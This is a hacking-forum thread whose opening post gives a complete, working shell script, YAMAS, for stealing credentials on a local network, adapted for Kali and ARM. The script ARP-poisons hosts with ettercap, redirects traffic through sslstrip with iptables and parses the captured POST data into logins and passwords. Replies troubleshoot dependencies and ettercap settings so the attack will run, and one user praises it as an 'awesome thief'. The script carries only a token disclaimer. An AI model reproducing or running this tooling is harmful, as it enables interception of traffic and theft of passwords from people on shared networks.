October 20, 2017, 04:15:31 PM
Welcome, Guest. Please login or register.

Support THS!! Buy a t-shirt at the top-hat-sec store! http://www.top-hat-sec.com/store/p23/T-Shirts.html

Author Topic: YAMAS creds stealer  (Read 4065 times)

Offline D4rk-50ld13r

  • Top Hat Member
  • Elite
  • ********
  • Posts: 877
  • Internets: +189/-0
  • I will hack for beer.
    • http://www.ghostsec.org/
YAMAS creds stealer
« on: May 11, 2013, 11:53:09 PM »
Grettings everyone

Originally this script was designed to work on NOKIA N900 , its a credentials stealer based on the famous YAMAS.
I modified few things in it and made it to work on any version on KALI & KALI ARM + Android.

Instructions

Make a folder in /opt , name it Yamas.
place yamas.sh in it.
make the script executable.
run it : cd /opt/Yamas
          ./yamas.sh

Enjoy  ;)

Code: [Select]
#!/bin/sh

# Bash script to launch man it the middle attack and sslstrip.
# Based on yamas v0.9 by comaX for pcsci3ence.info

# device variables
pathLog=/opt/Yamas

# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.

#Check if the script is being run as root
if [ "$(id -u)" != "0" ]; then
   echo -e "\033[31mYou are not running this script as root.\nPlease become root (e.g. \"sudo gainroot\") before launching this script\033[m"
   exit
fi

#Check if the required dependencies exist.
dep() {
   echo; echo -en "Checking for the needed dependencies:\n"
   echo -en "\t wget\t\t"
   if dpkg -l | grep wget 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t busybox-power\t"
   if dpkg -l | grep -w busybox-power 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t xterm\t\t"
   if dpkg -l | grep -w " xterm" 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t iptables\t"
   if dpkg -l | grep iptables 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
     
   echo -en "\t nmap\t\t"
   if dpkg -l | grep nmap 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t grep\t\t"
   if dpkg -l | grep libpcre3 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t pcap\t\t"
   if dpkg -l | grep libpcap0.8 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 > ./test.txt
   fi
         
   echo -en "\t sslstrip\t"
   #if dpkg -l | grep sslstrip 1>/dev/null; then  # "sslstrip" package doesn't exist. One has to compile on target.
   if [[ -e "/usr/bin/sslstrip" ]]; then          # therefore we do a simple check of existence
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
     
   echo -en "\t ettercap\t"
   if dpkg -l | grep ettercap 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t python-twisted-web"
   if dpkg -l | grep python-twisted-web 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t python-pyopenssl"
   if dpkg -l | grep python-pyopenssl 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   if [[ ! -e "./test.txt" ]]; then
      echo "All right ! Let's keep rolling..."
   else
      rm ./test.txt
      echo "You are missing dependencies, this script will probably fail."
      sleep 5
      #exit ?
   fi
}

#Check if yamas folder exists, if not create it
if [ ! -d "$pathLog" ]; then
   mkdir $pathLog
fi

if [ ! -f "/tmp/grepcred.txt" ]; then #in N900 the /tmp is purged at every reboot
   wget -q http://comax.pagesperso-orange.fr/info/mitm/grepcred.txt -O /tmp/grepcred.txt #downloading temp file nedded for parsing.
fi   #We do it now : we don't have to download twice in case --parse is used, and the script

#Let's define some arguments that can be passed to the script :
args=
while [ "$#" -ge 1 ] #check parameters
do
  case $1 in
   -d | --dependencies) #check for dependencies
      clear
      dep # calling the function.
      exit 0 ;;
     
-p | --parse) #parse a given filename
      if [[ "$2" == "" ]]; then
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
      clear
      echo -e "Parsing $2 for credentials.\n\n"
      cat $2 |
         awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
         awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
         egrep -i -a -f /tmp/grepcred.txt |
         awk -F "=" '{if (length($2) < 4) print "";
                      else if ($1 ~/Website/) print $0;
                      else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
                      else print "Login = \t"$2}' |
         uniq
      exit 0 ;;
     
  -h | --help) #define help message
      clear
      echo -e "You are running $0, YAMAS-ARM.

usage : $0 [-h | --help] [-p | --parse <file>]
   -h or --help : Displays this help message, disclaimer and exit.
   -d or --dependencies : Check if needed dependencies are satisfied and exit.
   -p or --parse: Only parse the given <file>. Don't use wildcards.
             Use > /output_file to print to a file.

\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting.

\033[31mFeatures :\033[m
- Compatbile with handled devices.
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D

\033[31m Credits :\033[m
Thanks to all people on backtrack forums for their help and support,
as well as maemo's for this version.
Kudos to Unhuman for asking for this port and testing everything I asked him,
Torpedo, both script-wise and for his great demo video,
Saturn for making this script fully ash compliant,
All the other people for their feedback, support, and help !
And google for being my best friend with scripting.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-arm or send me a mail at contact.comax@gmail.com

"
      exit ;;

*) echo "Invalid parameters, continuing with script $0" & sleep 2 ;;
  esac
  shift
done

clear
echo -e "\b
                  #     #    #    #     #    #     ##### 
                   #   #    # #   ##   ##   # #   #     #
                    # #    #   #  # # # #  #   #  #       
                     #    #     # #  #  # #     #  ##### 
                     #    ####### #     # #######       #
                     #    #     # #     # #     # #     #
                     #    #     # #     # #     #  #####
                        ARM Edition For Pcsi3ence.info
===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-arm                    =
=       Check out the help (-h) to see edition informations               =
=       You are running \033[32mYAMAS-arm\033[m                                    =
==========================================================================="

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
fast_cleanup() {
   echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
   if [[ "${looparseid}" != "" ]]; then kill ${looparseid}
   fi
   if [[ "${sslstripid}" != "" ]]; then kill ${sslstripid}
   fi
   if [[ "${tailgrepid}" != "" ]]; then kill ${tailgrepid}
   fi
   killall ettercap
   echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
   iptables --flush          # there are probably too many resets here,
   iptables --table nat --flush # but at least we're sure everything's clean
   iptables --delete-chain
   iptables --table nat --delete-chain
   if [ -e '/tmp/looparse.sh' ]; then
      rm /tmp/looparse.sh
   fi
   #We don't remove grepcred.txt anymore, in case it's needed later on for parsing, without internet connection.
   echo -e "\033[32m[-] Clean up successful !\033[m"
   exit 0
}

cleanup() {
   echo
   echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"

   kill ${sslstripid}
   kill ${looparseid}
   if [[ "${tailgrepid}" != "" ]]; then
      kill ${tailgrepid}
   fi
   killall ettercap
   echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
   iptables --flush # there are probably too many resets here,
   iptables --table nat --flush # but at least we're sure everything's clean
   iptables --delete-chain
   iptables --table nat --delete-chain
   rm /tmp/looparse.sh

   echo -e "\033[32m[-] Clean up successful !\033[m"
   echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
   echo "(If you want to keep it, it will be stored in $pathLog/saved/$filename.txt)"
   read keep
   if [[ "$keep" = "Y" || "$keep" = "y" ]] ; then # double brackets because double condition. || signifies "or"
      mkdir $pathLog/saved/
      cp $pathLog/$filename.txt $pathLog/saved/$filename.txt #moving file
         if [ -f "$pathLog/saved/$filename.txt" ]; then #check if it exists
            echo "Log file copied !" #it does
         else
            echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
         fi
   else
      echo "Logs not saved"
   fi
   echo
   echo "Do you want to save passwords to a file? (Y=keep)"
   echo "(If you want to keep it, it will be saved in $pathLog/saved/$filename.pass.txt)"
   read keeppd
   if [[ "$keeppd" = "Y" || "$keeppd" = "y" ]] ; then # double brackets because double condition. || signifies "or"
      mkdir $pathLog/saved/
      cat $pathLog/$filename.txt |
         awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
         awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
         egrep -i -a -f /tmp/grepcred.txt |
         awk -F "=" '{if (length($2) < 4) print "";
            else if ($1 ~/Website/) print $0;
            else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
            else print "Login = \t"$2}' |
         uniq >> $pathLog/saved/$filename.pass.txt # >> appends to a potential previous file.
      if [ -f "$pathLog/saved/$filename.pass.txt" ]; then #check if it exists
         echo "Passwords saved !" #it does
      else
         echo "Error while saving passwords" #it does not
      fi
   else
      echo "Password saving skipped."
   fi
   rm $pathLog/$filename.txt
   echo -e "\nTemporary files deleted."
}

search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
   echo -e "\033[31m"
   nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
   echo -en "\033[m"
   final
}

add_target() {
   echo "Enter a new IP adress to attack :"
   read newip
   xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e "sudo ettercap -o -q -i wlan0 -T -M arp  /$newip/ // 2>/dev/null & sleep 2" &
   final
}

ascii() {
   clear
   if [ ! -f "$pathLog/ascii" ]; then #if the ascii list doesn't exist get it from the web.
      wget -q http://comax.pagesperso-orange.fr/info/mitm/ascii -O $pathLog/ascii
   fi
   cat $pathLog/ascii
   #rm /tmp/ascii
   final
}

tailsecure() {
   xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f $pathLog/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
   final
}

rtparse() {
   echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
   1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
   2. Resume RTP.
   3. Kill RTP (stop and close xterm)
   4. Re-launch RTP
   5. Previous menu."
   read rtp
   if [ "$rtp" = "1" ] ; then
      echo -e "\033[33mPausing...\033[m"
      kill -19 ${looparseid}
      rtparse
   elif [ "$rtp" = "2" ] ; then
      echo -e "\033[33mResuming...\033[m"
      kill -18 ${looparseid}
      rtparse
   elif [ "$rtp" = "3" ] ; then
      echo -e "\033[31mKilling...\033[m"
      kill ${looparseid}
      rtparse
   elif [ "$rtp" = "4" ] ; then
      echo -e "\033[32mLaunching...\033[m"
      xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
      sleep 2
      rtparse
   elif [ "$rtp" = "5" ] ; then
      echo "Previous"
      final
   else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
      rtparse
   fi
}

final() {
   echo -e "\n\033[32mAttack is running\033[m. You can :
   1. Rescan network.
   2. Add a target (useless if targeting whole network).
   3. Display ASCII correspondence table.
   4. Tail-grep hosts through output (make sure there is traffic).
   5. Real-time parsing...
   6. Quit properly.

   Enter the number of the desired option."
   read final
   if [ "$final" = "1" ] ; then
      rescan
   elif [ "$final" = "2" ] ; then
     add_target
   elif [ "$final" = "3" ] ; then
     ascii
   elif [ "$final" = "4" ] ; then
     tailsecure
   elif [ "$final" = "5" ] ; then
     rtparse
   elif [ "$final" = "6" ] ; then
     cleanup
   else
      echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
      final
   fi
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read outport
if [ "$outport" = "" ] ; then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read inport
if [ "$inport" = "" ] ; then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo  "Choose filename to output : (default = yamas)"
read filename
if [ "$filename" = "" ] ; then
   filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in $pathLog/$filename.txt\033[m"
sslstrip -f -a -k -l $outport -w $pathLog/$filename.txt 2> /dev/null & sslstripid=$!

sleep 2 #let time for sslstrip to launch. Might be a bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#ARP poisoning
echo
echo -e "\033[31m [+] Activating ARP poisoning... \033[m"
echo
ip route show | awk '(NR == 2) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read gateway
if [ "$gateway" = "" ] ; then
   gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi
echo
echo "Using wlan0 as interface"
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read choicearp
echo

if [[ "$choicearp" = "D" || "$choicearp" = "d" ]] ; then
   echo
   echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
   read hosts
   echo -e "\033[31m "
      if [[ "$hosts" = "Y" || "$hosts" = "y" ]] ; then
         nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
         echo -e "\033[m " # switch color back to white
      else
         echo -e "\033[m "
      fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3 ... IPn
   \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
      while [ "$1" != "" ]; do
         xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i wlan0 -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
         shift
      done
      echo -e "\033[33m Targeting $parameters on $gateway through wlan0.\033[m"
   }
   echo "Enter IP adresse(s)."
   read parameters
   ettercapi $parameters

else
   xterm -geometry 90x3-1-1 -T ettercap -e 'ettercap -o -q -i wlan0 -T -M arp  /$gateway/ //' &
   sleep 2
   echo -e "\033[33m Targeting the whole network on $gateway on wlan0 with Ettercap\033[m"
   echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
fi

echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat $pathLog/$filename.txt |
      awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
      awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
      egrep -i -f '/tmp/grepcred.txt' |
      awk -F \"=\" '{if (length(\$2) < 3) print \"\";
      else if (\$1 ~/[W]/) print \$0;
      else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
      else print \"Login = \t\t\", \$2}' |
      uniq
      sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.

Credits to ComaX for the great script.

« Last Edit: May 12, 2013, 12:47:52 AM by D4rk-50ld13r »
If you sat a monkey down in front of a keyboard, the first thing typed would be
a unix command.

Offline darkc0d3

  • YOU CANNOT KILL AN IDEA
  • Top Hat Member
  • Elite
  • ********
  • Posts: 660
  • Internets: +35/-0
Re: YAMAS creds stealer
« Reply #1 on: May 12, 2013, 01:07:04 AM »
Very nice D4rk. i running this script now, first time in wheezy for me.
i play with this right now and ........ im not sure..... well does not save the text in /opt
is empty
root@pentester:~# cd /opt/Yamas
root@pentester:/opt/Yamas# ls
yamas.sh
root@pentester:/opt/Yamas#

i dont now what i doing wrong...
xmmmmm   some idea;
''When you have the knowledge you are a king, share the knowledge and you are God''
darkc0d3

Offline D4rk-50ld13r

  • Top Hat Member
  • Elite
  • ********
  • Posts: 877
  • Internets: +189/-0
  • I will hack for beer.
    • http://www.ghostsec.org/
Re: YAMAS creds stealer
« Reply #2 on: May 12, 2013, 01:16:43 AM »
Its all fine here !!
I trust that you did edit " etter.conf" file , did you ?  ;)
If everything is set , the script will run & log creds.
If you sat a monkey down in front of a keyboard, the first thing typed would be
a unix command.

Offline darkc0d3

  • YOU CANNOT KILL AN IDEA
  • Top Hat Member
  • Elite
  • ********
  • Posts: 660
  • Internets: +35/-0
Re: YAMAS creds stealer
« Reply #3 on: May 12, 2013, 03:14:37 AM »
I have not done that. I watch it now, I think something has to change in this lines;
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default

 here but I do now what  exactly  :o
''When you have the knowledge you are a king, share the knowledge and you are God''
darkc0d3

Offline thslover

  • Prospect
  • *
  • Posts: 4
  • Internets: +0/-0
Re: YAMAS creds stealer
« Reply #4 on: May 12, 2013, 03:40:34 AM »
darkc0d3 i think you must change those values to 0:
Code: [Select]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

And un-hash the iptables like this:

Code: [Select]
#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

D4rk-50ld13r i was using this script from the original site... the backtack version: http://comax.fr/yamas.php. Your version is the same only modified to work on kali, right?

Greets

Offline D4rk-50ld13r

  • Top Hat Member
  • Elite
  • ********
  • Posts: 877
  • Internets: +189/-0
  • I will hack for beer.
    • http://www.ghostsec.org/
Re: YAMAS creds stealer
« Reply #5 on: May 12, 2013, 03:56:06 AM »
Yes , as i specified that the script is an ARM written for Nokia N900
All i did is change path for the tools to work on Kali.
BTW , the backtrack version is totally different to this , cause Kali dosnt have /pentest directory in it.
On backtrack the tools involved are in /pentest/sniffers , on Kali the tools are stored in /usr/bin and /usr/sbin.
« Last Edit: May 12, 2013, 03:58:56 AM by D4rk-50ld13r »
If you sat a monkey down in front of a keyboard, the first thing typed would be
a unix command.

Offline darkc0d3

  • YOU CANNOT KILL AN IDEA
  • Top Hat Member
  • Elite
  • ********
  • Posts: 660
  • Internets: +35/-0
Re: YAMAS creds stealer
« Reply #6 on: May 12, 2013, 04:04:36 AM »
thslover thanks guys will look into it immediately, I got it I used older to backtrack.  I do not remember if I had to intervene in etter.conf file, simply I installed and run.
Was the script is awesome thief ;D ;D ;D
''When you have the knowledge you are a king, share the knowledge and you are God''
darkc0d3

Offline zerocool

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 223
  • Internets: +26/-3
Re: YAMAS creds stealer
« Reply #7 on: August 12, 2014, 04:51:07 PM »
Thanks for the ARM edition of this script, but there is an issue it fails on some dependencies.
I can't seem to install them.

Code: [Select]
Checking for the needed dependencies:
wget [Success]
busybox-power [Failed!]
xterm [Success]
iptables [Success]
nmap [Success]
grep [Success]
pcap [Success]
sslstrip [Success]
ettercap [Success]
python-twisted-web [Success]
python-pyopenssl [Failed!]
You are missing dependencies, this script will probably fail.
root@Kali-pi:~# apt-get install busybox-power
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package busybox-power
root@Kali-pi:~# apt-get install python-pyopenssl
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package python-pyopenssl





Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
  • ??? ???????? ?s ?? ??c?c??-???
Re: YAMAS creds stealer
« Reply #8 on: August 12, 2014, 04:59:48 PM »
The correct package name is python-openssl, try that instead.

Try looking through the script for where busybox-power is being called. You might be able to run the script without it, or maybe busybox-power is included with busybox.

apt-get install python-openssl
apt-get install busybox

Good luck.
« Last Edit: August 12, 2014, 05:02:21 PM by 0E 800 »
"He who passes not his days in the realm of dreams is the slave of the days."

Offline D4rk-50ld13r

  • Top Hat Member
  • Elite
  • ********
  • Posts: 877
  • Internets: +189/-0
  • I will hack for beer.
    • http://www.ghostsec.org/
Re: YAMAS creds stealer
« Reply #9 on: August 15, 2014, 04:34:05 PM »
Thanks for the ARM edition of this script, but there is an issue it fails on some dependencies.
I can't seem to install them.

Code: [Select]
Checking for the needed dependencies:
wget [Success]
busybox-power [Failed!]
xterm [Success]
iptables [Success]
nmap [Success]
grep [Success]
pcap [Success]
sslstrip [Success]
ettercap [Success]
python-twisted-web [Success]
python-pyopenssl [Failed!]
You are missing dependencies, this script will probably fail.
root@Kali-pi:~# apt-get install busybox-power
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package busybox-power
root@Kali-pi:~# apt-get install python-pyopenssl
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package python-pyopenssl


try this package , it should do the job :   http://archive.debian.net/etch/arm/python-pyopenssl
If you sat a monkey down in front of a keyboard, the first thing typed would be
a unix command.

satix

  • Guest
Re: YAMAS creds stealer
« Reply #10 on: June 03, 2015, 09:18:25 AM »
Anyone have any luck running this script in Kaili - What is the etter.conf edit that was mentioned?